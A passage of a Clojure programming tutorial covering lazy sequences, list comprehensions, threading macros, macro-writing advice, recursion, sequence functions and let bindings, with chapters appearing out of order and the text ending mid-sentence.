In chapter 4 we mentioned that most of the sequences in Clojure, like map, filter, iterate, repeatedly, and so on, were lazy: they did not evaluate any of their elements until required. This too is provided by a macro, called lazy-seq.

(defn integers [x] (lazy-seq (cons x (integers (inc x))))) user=> (def xs (integers 0)) #'user/xs

This sequence does not terminate; it is infinitely recursive. Yet it returned instantaneously. lazy-seq interrupted that recursion and restructured it into a sequence which constructs elements only when they are requested.

user=> (take 10 xs) (0 1 2 3 4 5 6 7 8 9)

When using lazy-seq and its partner lazy-cat, you don’t have to use recur–or even be tail-recursive. The macros interrupt each level of recursion, preventing stack overflows.
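For example, here’s an infinite Fibonacci sequence–the name fibs is ours, not Clojure’s. The recursive call is not in tail position, yet no stack overflows occur, because lazy-seq pauses each level of recursion until an element is demanded:

```clojure
(defn fibs
  "An infinite, lazy Fibonacci sequence. Each recursive call is
  wrapped in lazy-seq, so frames accumulate only as elements are
  actually realized--never all at once."
  ([] (fibs 0 1))
  ([a b] (lazy-seq (cons a (fibs b (+ a b))))))

(take 10 (fibs)) ; (0 1 1 2 3 5 8 13 21 34)
```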

You can also delay evaluation of some expressions until later, using delay and deref.

user=> (def x (delay (prn "computing a really big number!") (last (take 10000000 (iterate inc 0))))) #'user/x ; Did nothing, returned immediately user=> (deref x) "computing a really big number!" ; Now we have to wait! 9999999

List comprehensions

Combining recursion and laziness is the list comprehension macro, for. In its simplest form, for works like map:

user=> (for [x (range 10)] (- x)) (0 -1 -2 -3 -4 -5 -6 -7 -8 -9)

Like let, for takes a vector of bindings. Unlike let, however, for binds its variables to each possible combination of elements in their corresponding sequences.

user=> (for [x [1 2 3] y [:a :b]] [x y]) ([1 :a] [1 :b] [2 :a] [2 :b] [3 :a] [3 :b])

“For each x in the sequence [1 2 3], and for each y in the sequence [:a :b], find all [x y] pairs.” Note that the rightmost variable y iterates the fastest.

Like most sequence functions, the for macro yields lazy sequences. You can filter them with take, filter, et al like any other sequence. Or you can use :while to tell for when to stop, or :when to filter out combinations of elements.

(for [x (range 5) y (range 5) :when (and (even? x) (odd? y))] [x y]) ([0 1] [0 3] [2 1] [2 3] [4 1] [4 3])
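Where :when filters out individual combinations, :while stops iteration entirely the first time its test fails–which makes it safe to draw from an infinite sequence:

```clojure
; (range) is infinite, but :while cuts it short at x = 5.
user=> (for [x (range) :while (< x 5)] (* x x))
(0 1 4 9 16)
```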

Clojure includes a rich smörgåsbord of control-flow constructs; we’ll meet new ones throughout the book.

The threading macros

Sometimes you want to thread a computation through several expressions, like a chain. Object-oriented languages like Ruby or Java are well-suited to this style:

1.9.3p385 :004 > (0..10).select(&:odd?).reduce(&:+) 25

Start with the range 0 to 10, then call select on that range, with the function odd?. Finally, take that sequence of numbers, and reduce it with the + function.

The Clojure threading macros do the same by restructuring a sequence of expressions, inserting each expression as the first (or final) argument in the next expression.

user=> (pprint (clojure.walk/macroexpand-all '(->> (range 10) (filter odd?) (reduce +)))) (reduce + (filter odd? (range 10))) user=> (->> (range 10) (filter odd?) (reduce +)) 25

->> took (range 10) and inserted it at the end of (filter odd?), forming (filter odd? (range 10)). Then it took that expression and inserted it at the end of (reduce +). In essence, ->> flattens and reverses a nested chain of operations.

->, by contrast, inserts each form in as the first argument in the following expression.

user=> (pprint (clojure.walk/macroexpand-all '(-> {:proton :fermion} (assoc :photon :boson) (assoc :neutrino :fermion)))) (assoc (assoc {:proton :fermion} :photon :boson) :neutrino :fermion) user=> (-> {:proton :fermion} (assoc :photon :boson) (assoc :neutrino :fermion)) {:neutrino :fermion, :photon :boson, :proton :fermion}

Clojure isn’t just function-oriented in its syntax; it can be object-oriented, and stack-oriented, and array-oriented, and so on–and mix all of these styles freely, in a controlled way. If you don’t like the way the language fits a certain problem, you can write a macro which defines a new language, specifically for that subproblem.

cond, condp and case, for example, express a language for branching based on predicates. ->, ->>, and doto express object-oriented and other expression-chaining languages.
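doto, which we haven’t shown yet, threads an object through a series of expressions for their side effects, then returns the original object–handy for mutable Java classes:

```clojure
; Each (.put ...) call is made on the same HashMap;
; doto returns the map itself, not the result of the last .put.
user=> (doto (java.util.HashMap.)
         (.put "a" 1)
         (.put "b" 2))
```

Without doto, we’d have to bind the map with let and call .put on it line by line, discarding each return value by hand.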

  • core.match is a set of macros which express powerful pattern-matching and substitution languages.
  • core.logic expresses syntax for logic programming, for finding values which satisfy complex constraints.
  • core.async restructures Clojure code into asynchronous forms so they can do many things at once.
  • For those with a twisted sense of humor, Swiss Arrows extends the threading macros into evil–but delightfully concise!–forms.

We’ll see a plethora of macros, from simple to complex, through the course of this book. Each one shares the common pattern of simplifying code; reducing tangled or verbose expressions into something more concise, more meaningful, better suited to the problem at hand.

When to use macros

While it’s important to be aware of the purpose and behavior of the macro system, you don’t need to write your own macros to be productive with Clojure. For now, you’ll be just fine writing code which uses the existing macros in the language. When you do need to delve deeper, come back to this guide and experiment. It’ll take some time to sink in.

First, know that writing macros is tricky, even for experts. It requires you to think at two levels simultaneously, and to be mindful of the distinction between expression and underlying evaluation. Writing a macro is essentially extending the language, the compiler, the syntax and evaluation model of Clojure, by restructuring arbitrary expressions into ones the evaluation system understands. This is hard, and it’ll take practice to get used to.

In addition, Clojure macros come with some important restrictions. Because they’re expanded prior to evaluation, macros are invisible to functions. They can’t be composed functionally–you can’t (map or ...), for instance.
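When you do need a macro’s behavior in a functional context, wrap it in a fn–functions are values, and compose freely:

```clojure
; or is a macro, so it can't be passed to map directly--
; but an anonymous function wrapping or works fine.
user=> (map (fn [a b] (or a b)) [nil 1] [2 nil])
(2 1)
```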

So in general, if you can solve a problem without writing a macro, don’t write one. It’ll be easier to debug, easier to understand, and easier to compose later. Only reach for macros when you need new syntax, or when performance demands the code be transformed at compile time.

When you do write a macro, consider its scope carefully. Keep the transformation simple; and do as much in normal functions as possible. Provide an escape hatch where possible, by doing most of the work in a function, and writing a small wrapper macro which calls that function. Finally, remember the distinction between code and what that code evaluates to. Use let whenever a value is to be re-used, to prevent it being evaluated twice by accident.
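Putting that advice together, here’s a sketch of a logging macro–both log and log* are invented names–where the macro does nothing but quote its argument and bind its value once; a plain function does the real work:

```clojure
(defn log*
  "Does the actual work: prints an expression and its value, then
  returns the value. Being an ordinary function, log* is easy to
  test and compose."
  [expr value]
  (prn expr '=> value)
  value)

(defmacro log
  "A thin wrapper: quotes the expression, evaluates it exactly once
  via let (so side effects aren't duplicated), and hands both the
  code and its value to log*."
  [expr]
  `(let [v# ~expr]
     (log* '~expr v#)))

user=> (log (+ 1 2))
(+ 1 2) => 3
3
```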

For a deeper exploration of Clojure macros in a real-world application, try Language Power.

Review

In Chapter 4, deeply nested expressions led to the desire for a simpler, more direct expression of a chain of sequence operations. We learned that the Clojure compiler first expands expressions before evaluating them, using macros–special functions which take code and return other code. We used macros to define the short-circuiting or operator, and followed that with a tour of basic control flow, recursion, laziness, list comprehensions, and chained expressions. Finally, we learned a bit about when and how to write our own macros.

Throughout this chapter we’ve brushed against the idea of side effects: things which change the outside world. We might change a var with def, or print a message to the screen with prn. Real languages must model a continually shifting universe, which leads us to Chapter Six: Side effects and state.

Problems

  1. Using the control flow constructs we’ve learned, write a schedule function which, given an hour of the day, returns what you’ll be doing at that time. (schedule 18), for me, returns :dinner.

  2. Using the threading macros, find how many numbers from 0 to 9999 are palindromes: identical when written forwards and backwards. 121 is a palindrome, as are 7447 and 5, but not 12 or 953.

  3. Write a macro id which takes a function and a list of args: (id f a b c), and returns an expression which calls that function with the given args: (f a b c).

  4. Write a macro log which uses a var, logging-enabled, to determine whether or not to print an expression to the console at compile time. If logging-enabled is false, (log :hi) should macroexpand to nil. If logging-enabled is true, (log :hi) should macroexpand to (prn :hi). Why would you want to do this check during compilation, instead of when running the program? What might you lose?

  5. (Advanced) Using the rationalize function, write a macro exact which rewrites any use of +, -, *, or / to force the use of ratios instead of floating-point numbers. (* 2452.45 100) returns 245244.99999999997, but (exact (* 2452.45 100)) should return 245245N

In Chapter 3, we discovered functions as a way to abstract expressions; to rephrase a particular computation with some parts missing. We used functions to transform a single value. But what if we want to apply a function to more than one value at once? What about sequences?

For example, we know that (inc 2) increments the number 2. What if we wanted to increment every number in the vector [1 2 3], producing [2 3 4]?

user=> (inc [1 2 3])
ClassCastException clojure.lang.PersistentVector cannot be cast to java.lang.Number  clojure.lang.Numbers.inc (Numbers.java:110)

Clearly inc can only work on numbers, not on vectors. We need a different kind of tool.

A direct approach

Let’s think about the problem in concrete terms. We want to increment each of three elements: the first, second, and third. We know how to get an element from a sequence by using nth, so let’s start with the first number, at index 0:

user=> (def numbers [1 2 3])
#'user/numbers
user=> (nth numbers 0)
1
user=> (inc (nth numbers 0))
2

So there’s the first element incremented. Now we can do the second:

user=> (inc (nth numbers 1))
3
user=> (inc (nth numbers 2))
4

And it should be straightforward to combine these into a vector…

user=> [(inc (nth numbers 0)) (inc (nth numbers 1)) (inc (nth numbers 2))] [2 3 4]

Success! We’ve incremented each of the numbers in the list! How about a list with only two elements?

user=> (def numbers [1 2])
#'user/numbers
user=> [(inc (nth numbers 0)) (inc (nth numbers 1)) (inc (nth numbers 2))]
IndexOutOfBoundsException clojure.lang.PersistentVector.arrayFor (PersistentVector.java:107)

Shoot. We tried to get the element at index 2, but couldn’t, because numbers only has indices 0 and 1. Clojure calls that “index out of bounds”.

We could just leave off the third expression in the vector; taking only elements 0 and 1. But the problem actually gets much worse, because we’d need to make this change every time we wanted to use a different sized vector. And what of a vector with 1000 elements? We’d need 1000 (inc (nth numbers ...)) expressions! Down this path lies madness.

Let’s back up a bit, and try a slightly smaller problem.

Recursion

What if we just incremented the first number in the vector? How would that work? We know that first finds the first element in a sequence, and rest finds all the remaining ones.

user=> (first [1 2 3])
1
user=> (rest [1 2 3])
(2 3)

So there’s the pieces we’d need. To glue them back together, we can use a function called cons, which says “make a list beginning with the first argument, followed by all the elements in the second argument”.

user=> (cons 1 [2])
(1 2)
user=> (cons 1 [2 3])
(1 2 3)
user=> (cons 1 [2 3 4])
(1 2 3 4)

OK so we can split up a sequence, increment the first part, and join them back together. Not so hard, right?

(defn inc-first [nums]
  (cons (inc (first nums))
        (rest nums)))

user=> (inc-first [1 2 3 4])
(2 2 3 4)

Hey, there we go! First element changed. Will it work with any length list?

user=> (inc-first [5])
(6)
user=> (inc-first [])
NullPointerException clojure.lang.Numbers.ops (Numbers.java:942)

Shoot. We can’t increment the first element of this empty vector, because it doesn’t have a first element.

user=> (first [])
nil
user=> (inc nil)
NullPointerException clojure.lang.Numbers.ops (Numbers.java:942)

So there are really two cases for this function. If there is a first element in nums, we’ll increment it as normal. If there’s no such element, we’ll return an empty list. To express this kind of conditional behavior, we’ll use a Clojure special form called if:

user=> (doc if)
-------------------------
if
  (if test then else?)
Special Form
  Evaluates test. If not the singular values nil or false,
  evaluates and yields then, otherwise, evaluates and yields else.
  If else is not supplied it defaults to nil.

  Please see http://clojure.org/special_forms#if

To confirm our intuition:

user=> (if true :a :b)
:a
user=> (if false :a :b)
:b

Seems straightforward enough.

(defn inc-first [nums]
  (if (first nums)
    ; If there's a first number, build a new list with cons
    (cons (inc (first nums))
          (rest nums))
    ; If there's no first number, just return an empty list
    (list)))

user=> (inc-first [])
()
user=> (inc-first [1 2 3])
(2 2 3)

Success! Now we can handle both cases: empty sequences, and sequences with things in them. Now how about incrementing that second number? Let’s stare at that code for a bit.

(rest nums)

Hang on. That list–(rest nums)–that’s a list of numbers too. What if we… used our inc-first function on that list, to increment its first number? Then we’d have incremented both the first and the second element.

(defn inc-more [nums]
  (if (first nums)
    (cons (inc (first nums))
          (inc-more (rest nums)))
    (list)))

user=> (inc-more [1 2 3 4])
(2 3 4 5)

Odd. That didn’t just increment the first two numbers. It incremented all the numbers. We fell into the complete solution entirely by accident. What happened here?

Well first we… yes, we got the number one, and incremented it. Then we stuck that onto (inc-more [2 3 4]), which got two, and incremented it. Then we stuck that two onto (inc-more [3 4]), which got three, and then we did the same for four. Only that time around, at the very end of the list, (rest [4]) would have been empty. So when we went to get the first number of the empty list, we took the second branch of the if, and returned the empty list.

Having reached the bottom of the function calls, so to speak, we zip back up the chain. We can imagine this function turning into a long string of cons calls, like so:

(cons 2 (cons 3 (cons 4 (cons 5 '()))))
(cons 2 (cons 3 (cons 4 '(5))))
(cons 2 (cons 3 '(4 5)))
(cons 2 '(3 4 5))
'(2 3 4 5)

This technique is called recursion, and it is a fundamental principle in working with collections, sequences, trees, or graphs… any problem which has small parts linked together. There are two key elements in a recursive program:

  1. Some part of the problem which has a known solution
  2. A relationship which connects one part of the problem to the next

Incrementing the elements of an empty list returns the empty list. This is our base case: the ground to build on. Our inductive case, also called the recurrence relation, is how we broke the problem up into incrementing the first number in the sequence, and incrementing all the numbers in the rest of the sequence. The if expression bound these two cases together into a single function; a function defined in terms of itself.

Once the initial step has been taken, every step can be taken.

user=> (inc-more [1 2 3 4 5 6 7 8 9 10 11 12]) (2 3 4 5 6 7 8 9 10 11 12 13)

This is the beauty of a recursive function; folding an unbounded stream of computation over and over, onto itself, until only a single step remains.
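The same two ingredients appear in other recursive functions. As a sketch (the name sum is ours, not from clojure.core; empty? tests whether a sequence has no elements), here's a function which adds up a sequence of numbers in the style of inc-more:

```clojure
(defn sum [nums]
  (if (empty? nums)
    ; Base case: the sum of no numbers is zero.
    0
    ; Inductive case: the first number, plus the sum of the rest.
    (+ (first nums) (sum (rest nums)))))
```

(sum [1 2 3 4]) unwinds just like inc-more did: (+ 1 (+ 2 (+ 3 (+ 4 0)))).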

Generalizing from inc

We set out to increment every number in a vector, but nothing in our solution actually depended on inc. It just as well could have been dec, or str, or keyword. Let’s parameterize our inc-more function to use any transformation of its elements:

(defn transform-all [f xs]
  (if (first xs)
    (cons (f (first xs))
          (transform-all f (rest xs)))
    (list)))

Because we could be talking about any kind of sequence, not just numbers, we’ve named the sequence xs, and its first element x. We also take a function f as an argument, and that function will be applied to each x in turn. So not only can we increment numbers…

user=> (transform-all inc [1 2 3 4]) (2 3 4 5)

…but we can turn strings to keywords…

user=> (transform-all keyword ["bell" "hooks"]) (:bell :hooks)

…or wrap every element in a list:

user=> (transform-all list [:codex :book :manuscript]) ((:codex) (:book) (:manuscript))

In short, this function expresses a sequence in which each element is some function applied to the corresponding element in the underlying sequence. This idea is so important that it has its own name, in mathematics, Clojure, and other languages. We call it map.

user=> (map inc [1 2 3 4]) (2 3 4 5)

You might remember maps as a datatype in Clojure, too–they’re dictionaries that relate keys to values.

{:year 1969 :event "moon landing"}

The function map relates one sequence to another. The type map relates keys to values. There is a deep symmetry between the two: maps are usually sparse, and the relationships between keys and values may be arbitrarily complex. The map function, on the other hand, usually expresses the same type of relationship, applied to a series of elements in fixed order.
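The symmetry runs deeper than the name: a Clojure map can itself be called as a function of its keys, so we can hand one to the map function to look up a series of keys. A small illustration:

```clojure
;; Calling a map as a function looks up a key; mapping a map over a
;; sequence of keys looks each one up in turn.
(map {:year 1969 :event "moon landing"} [:year :event])
;; => (1969 "moon landing")
```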

Building sequences

Recursion can do more than just map. We can use it to expand a single value into a sequence of values, each related by some function. For instance:

(defn expand [f x count]
  (if (pos? count)
    (cons x (expand f (f x) (dec count)))))

Our base case is x itself, followed by the sequence beginning with (f x). That sequence in turn expands to (f (f x)), and then (f (f (f x))), and so on. Each time we call expand, we count down by one using dec. Once the count is zero, the if returns nil, and evaluation stops. If we start with the number 0 and use inc as our function:

user=> (expand inc 0 10)
(0 1 2 3 4 5 6 7 8 9)

Clojure has a more general form of this function, called iterate.

user=> (take 10 (iterate inc 0)) (0 1 2 3 4 5 6 7 8 9)

Since this sequence is infinitely long, we’re using take to select only the first 10 elements. We can construct more complex sequences by using more complex functions:

user=> (take 10 (iterate (fn [x] (if (odd? x) (+ 1 x) (/ x 2))) 10)) (10 5 6 3 4 2 1 2 1 2)

Or build up strings:

user=> (take 5 (iterate (fn [x] (str x "o")) "y")) ("y" "yo" "yoo" "yooo" "yoooo")

iterate is extremely handy for working with infinite sequences, and has some partners in crime. repeat, for instance, constructs a sequence where every element is the same.

user=> (take 10 (repeat :hi))
(:hi :hi :hi :hi :hi :hi :hi :hi :hi :hi)
user=> (repeat 3 :echo)
(:echo :echo :echo)

And its close relative repeatedly simply calls a function (f) to generate an infinite sequence of values, over and over again, without any relationship between elements. For an infinite sequence of random numbers:

user=> (rand)
0.9002678382322784
user=> (rand)
0.12375594203332863
user=> (take 3 (repeatedly rand))
(0.44442397843046755 0.33668691162169784 0.18244875487846746)

Notice that calling (rand) returns a different number each time. We say that rand is an impure function, because it cannot simply be replaced by the same value every time. It does something different each time it’s called.

There’s another very handy sequence function specifically for numbers: range, which generates a sequence of numbers between two points. (range n) gives n successive integers starting at 0. (range n m) returns integers from n to m-1. (range n m step) returns integers from n up to (but not including) m, separated by step.

user=> (range 5)
(0 1 2 3 4)
user=> (range 2 10)
(2 3 4 5 6 7 8 9)
user=> (range 0 100 5)
(0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95)

To extend a sequence by repeating it forever, use cycle:

user=> (take 10 (cycle [1 2 3])) (1 2 3 1 2 3 1 2 3 1)

Transforming sequences

Given a sequence, we often want to find a related sequence. map, for instance, applies a function to each element–but has a few more tricks up its sleeve.

user=> (map (fn [n vehicle] (str "I've got " n " " vehicle "s")) [0 200 9] ["car" "train" "kiteboard"]) ("I've got 0 cars" "I've got 200 trains" "I've got 9 kiteboards")

If given multiple sequences, map calls its function with one element from each sequence in turn. So the first value will be (f 0 "car"), the second (f 200 "train"), and so on. Like a zipper, map folds together corresponding elements from multiple collections. To sum three vectors, column-wise:

user=> (map + [1 2 3] [4 5 6] [7 8 9]) (12 15 18)

If one sequence is bigger than another, map stops at the end of the smaller one. We can exploit this to combine finite and infinite sequences. For example, to number the elements in a vector:

user=> (map (fn [index element] (str index ". " element)) (iterate inc 0) ["erlang" "ruby" "haskell"]) ("0. erlang" "1. ruby" "2. haskell")

Transforming elements together with their indices is so common that Clojure has a special function for it: map-indexed:

user=> (map-indexed (fn [index element] (str index ". " element)) ["erlang" "ruby" "haskell"]) ("0. erlang" "1. ruby" "2. haskell")

You can also tack one sequence onto the end of another, like so:

user=> (concat [1 2 3] [:a :b :c] [4 5 6]) (1 2 3 :a :b :c 4 5 6)

Another way to combine two sequences is to riffle them together, using interleave.

user=> (interleave [:a :b :c] [1 2 3]) (:a 1 :b 2 :c 3)

And if you want to insert a specific element between each successive pair in a sequence, try interpose:

user=> (interpose :and [1 2 3 4]) (1 :and 2 :and 3 :and 4)

To reverse a sequence, use reverse.

user=> (reverse [1 2 3])
(3 2 1)
user=> (reverse "woolf")
(\f \l \o \o \w)

Strings are sequences too! Each element of a string is a character, written \f. You can rejoin those characters into a string with apply str:

user=> (apply str (reverse "woolf")) "floow"

…and break strings up into sequences of chars with seq.

user=> (seq "sato") (\s \a \t \o)

To randomize the order of a sequence, use shuffle.

user=> (shuffle [1 2 3 4])
[3 1 2 4]
user=> (apply str (shuffle (seq "abracadabra")))
"acaadabrrab"

Subsequences

We’ve already seen take, which selects the first n elements. There’s also drop, which removes the first n elements.

user=> (range 10)
(0 1 2 3 4 5 6 7 8 9)
user=> (take 3 (range 10))
(0 1 2)
user=> (drop 3 (range 10))
(3 4 5 6 7 8 9)

And for slicing apart the other end of the sequence, we have take-last and drop-last:

user=> (take-last 3 (range 10))
(7 8 9)
user=> (drop-last 3 (range 10))
(0 1 2 3 4 5 6)

take-while and drop-while work just like take and drop, but use a function to decide when to cut.

user=> (take-while pos? [3 2 1 0 -1 -2 10]) (3 2 1)

In general, one can cut a sequence in twain by using split-at, and giving it a particular index. There’s also split-with, which uses a function to decide when to cut.

user=> (split-at 4 (range 10))
[(0 1 2 3) (4 5 6 7 8 9)]
user=> (split-with number? [1 2 3 :mark 4 5 6 :mark 7])
[(1 2 3) (:mark 4 5 6 :mark 7)]

Notice that because indexes start at zero, sequence functions tend to have predictable numbers of elements. (split-at 4) yields four elements in the first collection, and ensures the second collection begins at index four. (range 10) has ten elements, corresponding to the first ten indices in a sequence. (range 3 5) has two (since 5 - 3 is two) elements. These choices simplify the definition of recursive functions as well.

We can select particular elements from a sequence by applying a function. To find all positive numbers in a list, use filter:

user=> (filter pos? [1 5 -4 -7 3 0]) (1 5 3)

filter looks at each element in turn, and includes it in the resulting sequence only if (f element) returns a truthy value. Its complement is remove, which only includes those elements where (f element) is false or nil.

user=> (remove string? [1 "turing" :apple]) (1 :apple)

Finally, one can group a sequence into chunks using partition, partition-all, or partition-by. For instance, one might group alternating values into pairs:

user=> (partition 2 [:cats 5 :bats 27 :crocodiles 0]) ((:cats 5) (:bats 27) (:crocodiles 0))

Or separate a series of numbers into negative and positive runs:

user=> (partition-by neg? [1 2 3 2 1 -1 -2 -3 -2 -1 1 2])
((1 2 3 2 1) (-1 -2 -3 -2 -1) (1 2))

Collapsing sequences

After transforming a sequence, we often want to collapse it in some way; to derive some smaller value. For instance, we might want the number of times each element appears in a sequence:

user=> (frequencies [:meow :mrrrow :meow :meow]) {:meow 3, :mrrrow 1}

Or to group elements by some function:

user=> (pprint (group-by :first [{:first "Li"    :last "Zhou"}
                                 {:first "Sarah" :last "Lee"}
                                 {:first "Sarah" :last "Dunn"}
                                 {:first "Li"    :last "O'Toole"}]))
{"Li" [{:last "Zhou", :first "Li"} {:last "O'Toole", :first "Li"}],
 "Sarah" [{:last "Lee", :first "Sarah"} {:last "Dunn", :first "Sarah"}]}

Here we’ve taken a sequence of people with first and last names, and used the :first keyword (which can act as a function!) to look up those first names. group-by used that function to produce a map of first names to lists of people–kind of like an index.

In general, we want to combine elements together in some way, using a function. Where map treated each element independently, reducing a sequence requires that we bring some information along. The most general way to collapse a sequence is reduce.

user=> (doc reduce)
-------------------------
clojure.core/reduce
([f coll] [f val coll])
  f should be a function of 2 arguments. If val is not supplied,
  returns the result of applying f to the first 2 items in coll, then
  applying f to that result and the 3rd item, etc. If coll contains no
  items, f must accept no arguments as well, and reduce returns the
  result of calling f with no arguments. If coll has only 1 item, it
  is returned and f is not called. If val is supplied, returns the
  result of applying f to val and the first item in coll, then
  applying f to that result and the 2nd item, etc. If coll contains no
  items, returns val and f is not called.

That’s a little complicated, so we’ll start small. We need a function, f, which combines successive elements of the sequence. (f state element) will return the state for the next invocation of f. As f moves along the sequence, it carries some changing state with it. The final state is the return value of reduce.

user=> (reduce + [1 2 3 4]) 10

reduce begins by calling (+ 1 2), which yields the state 3. Then it calls (+ 3 3), which yields 6. Then (+ 6 4), which returns 10. We’ve taken a function over two elements, and used it to combine all the elements. Mathematically, we could write:

1 + 2 + 3 + 4
3 + 3 + 4
6 + 4
10

So another way to look at reduce is like sticking a function between each pair of elements. To see the reducing process in action, we can use reductions, which returns a sequence of all the intermediate states.

user=> (reductions + [1 2 3 4]) (1 3 6 10)

Oftentimes we include a default state to start with. For instance, we could start with an empty set, and add each element to it as we go along:

user=> (reduce conj #{} [:a :b :b :b :a :a]) #{:a :b}
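To see reduce carrying richer state, we can sketch our own version of the frequencies function from earlier, accumulating counts in a map. (The name my-frequencies is ours; get takes an optional default value for missing keys.)

```clojure
(defn my-frequencies [coll]
  (reduce (fn [counts element]
            ; The state is a map of elements to counts. Each step
            ; returns a new map with this element's count incremented,
            ; treating a missing key as zero.
            (assoc counts element (inc (get counts element 0))))
          {}   ; start with an empty map
          coll))
```

(my-frequencies [:meow :mrrrow :meow :meow]) behaves like the built-in frequencies.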

Reducing elements into a collection has its own name: into. We can conj [key value] vectors into a map, for instance, or build up a list:

user=> (into {} [[:a 2] [:b 3]])
{:a 2, :b 3}
user=> (into (list) [1 2 3 4])
(4 3 2 1)

Because elements added to a list appear at the beginning, not the end, this expression reverses the sequence. Vectors conj onto the end, so to emit the elements in order, using reduce, we might try:

user=> (reduce conj [] [1 2 3 4 5])
[1 2 3 4 5]

Which brings up an interesting thought: this looks an awful lot like map. All that’s missing is some kind of transformation applied to each element.

(defn my-map [f coll]
  (reduce (fn [output element]
            (conj output (f element)))
          []
          coll))

user=> (my-map inc [1 2 3 4])
[2 3 4 5]

Huh. map is just a special kind of reduce. What about, say, take-while?

(defn my-take-while [f coll]
  (reduce (fn [out elem]
            (if (f elem)
              (conj out elem)
              (reduced out)))
          []
          coll))

We’re using a special function here, reduced, to indicate that we’ve completed our reduction early and can skip the rest of the sequence.

user=> (my-take-while pos? [2 1 0 -1 0 1 2]) [2 1]

reduce really is the uberfunction over sequences. Almost any operation on a sequence can be expressed in terms of a reduce–though for various reasons, many of the Clojure sequence functions are not written this way. For instance, take-while is actually defined like so:

user=> (source take-while)
(defn take-while
  "Returns a lazy sequence of successive items from coll while
  (pred item) returns true. pred must be free of side-effects."
  {:added "1.0"
   :static true}
  [pred coll]
  (lazy-seq
   (when-let [s (seq coll)]
     (when (pred (first s))
       (cons (first s) (take-while pred (rest s)))))))

There’s a few new pieces here, but the structure is essentially the same as our initial attempt at writing map. When the predicate matches the first element, cons the first element onto take-while, applied to the rest of the sequence. That lazy-seq construct allows Clojure to compute this sequence as required, instead of right away. It defers execution to a later time.
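The same shape can make our earlier transform-all lazy. This is a sketch of the technique, not the definition of clojure.core's map (the name transform-all-lazily is ours):

```clojure
(defn transform-all-lazily [f xs]
  (lazy-seq                  ; defer the work until someone asks
   (when-let [s (seq xs)]    ; nil (an empty result) when xs is empty
     (cons (f (first s))
           (transform-all-lazily f (rest s))))))
```

Because each recursive call is wrapped in lazy-seq, we can apply it to an infinite sequence and take only what we need.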

Most of Clojure’s sequence functions are lazy. They don’t do anything until needed. For instance, we can increment every number from zero to infinity:

user=> (def infseq (map inc (iterate inc 0)))
#'user/infseq
user=> (realized? infseq)
false

That function returned immediately. Because it hasn’t done any work yet, we say the sequence is unrealized. It doesn’t increment any numbers at all until we ask for them:

user=> (take 10 infseq)
(1 2 3 4 5 6 7 8 9 10)
user=> (realized? infseq)
true

Lazy sequences also remember their contents, once evaluated, for faster access.
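A sketch of that caching behavior, with an artificial delay to make the cost of realization visible (the Thread/sleep is only there to simulate expensive work):

```clojure
(def slow-seq
  (map (fn [x]
         (Thread/sleep 50) ; simulate an expensive computation
         (inc x))
       (range 5)))

;; The first full traversal (e.g. with doall) pays the sleep cost for
;; every element; traversing slow-seq again reuses the cached values.
```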

Putting it all together

We’ve seen how recursion generalizes a function over one thing into a function over many things, and discovered a rich landscape of recursive functions over sequences. Now let’s use our knowledge of sequences to solve a more complex problem: find the sum of the products of consecutive pairs of the first 1000 odd integers.

First, we’ll need the integers. We can start with 0, and work our way up to infinity. To save time printing an infinite number of integers, we’ll start with just the first 10.

user=> (take 10 (iterate inc 0)) (0 1 2 3 4 5 6 7 8 9)

Now we need to find only the ones which are odd. Remember, filter pares down a sequence to only those elements which pass a test.

user=> (take 10 (filter odd? (iterate inc 0))) (1 3 5 7 9 11 13 15 17 19)

For consecutive pairs, we want to take [1 3 5 7 ...] and find a sequence like ([1 3] [3 5] [5 7] ...). That sounds like a job for partition:

user=> (take 3 (partition 2 (filter odd? (iterate inc 0)))) ((1 3) (5 7) (9 11))

Not quite right–this gave us non-overlapping pairs, but we wanted overlapping ones too. A quick check of (doc partition) reveals the step parameter:

user=> (take 3 (partition 2 1 (filter odd? (iterate inc 0)))) ((1 3) (3 5) (5 7))

Now we need to find the product for each pair. Given a pair, multiply the two pieces together… yes, that sounds like map:

user=> (take 3 (map (fn [pair] (* (first pair) (second pair))) (partition 2 1 (filter odd? (iterate inc 0))))) (3 15 35)

Getting a bit unwieldy, isn’t it? Only one final step: sum all those products. We’ll adjust the take to include the first 1000, not the first 3, elements.

user=> (reduce +
               (take 1000
                     (map (fn [pair] (* (first pair) (second pair)))
                          (partition 2 1 (filter odd? (iterate inc 0))))))
1335333000

The sum of the first thousand products of consecutive pairs of the odd integers starting at 0. See how each part leads to the next? This expression looks a lot like the way we phrased the problem in English–but both English and Lisp expressions are sort of backwards, in a way. The part that happens first appears deepest, last, in the expression. In a chain of reasoning like this, it’d be nicer to write it in order.

user=> (->> 0
            (iterate inc)
            (filter odd?)
            (partition 2 1)
            (map (fn [pair] (* (first pair) (second pair))))
            (take 1000)
            (reduce +))
1335333000

Much easier to read: now everything flows in order, from top to bottom, and we’ve flattened out the deeply nested expressions into a single level. This is how object-oriented languages structure their expressions: as a chain of function invocations, each acting on the previous value.

But how is this possible? Which expression gets evaluated first? (take 1000) isn’t even a valid call–where’s its second argument? How are any of these forms evaluated?

What kind of arcane function is ->>?

All these mysteries, and more, in Chapter 5: Macros.

Problems

  1. Write a function to find out if a string is a palindrome–that is, if it looks the same forwards and backwards.
  2. Find the number of ‘c’s in “abracadabra”.
  3. Write your own version of filter.
  4. Find the first 100 prime numbers: 2, 3, 5, 7, 11, 13, 17, ….

We left off last chapter with a question: what are verbs, anyway? When you evaluate (type :mary-poppins), what really happens?

user=> (type :mary-poppins) clojure.lang.Keyword

To understand how type works, we’ll need several new ideas. First, we’ll expand on the notion of symbols as references to other values. Then we’ll learn about functions: Clojure’s verbs. Finally, we’ll use the Var system to explore and change the definitions of those functions.

Let bindings

We know that symbols are names for things, and that when evaluated, Clojure replaces those symbols with their corresponding values. +, for instance, is a symbol which points to the verb #<core$_PLUS_ clojure.core$_PLUS_@12992c>.

user=> + #<core$_PLUS_ clojure.core$_PLUS_@12992c>

When you try to use a symbol which has no defined meaning, Clojure refuses:

user=> cats
CompilerException java.lang.RuntimeException: Unable to resolve symbol: cats in this context, compiling:(NO_SOURCE_PATH:0:0)

But we can define a meaning for a symbol within a specific expression, using let.

user=> (let [cats 5] (str "I have " cats " cats.")) "I have 5 cats."

The let expression first takes a vector of bindings: alternating symbols and values that those symbols are bound to, within the remainder of the expression. “Let the symbol cats be 5, and construct a string composed of "I have ", cats, and " cats".”

Let bindings apply only within the let expression itself. They also override any existing definitions for symbols at that point in the program. For instance, we can redefine addition to mean subtraction, for the duration of a let:

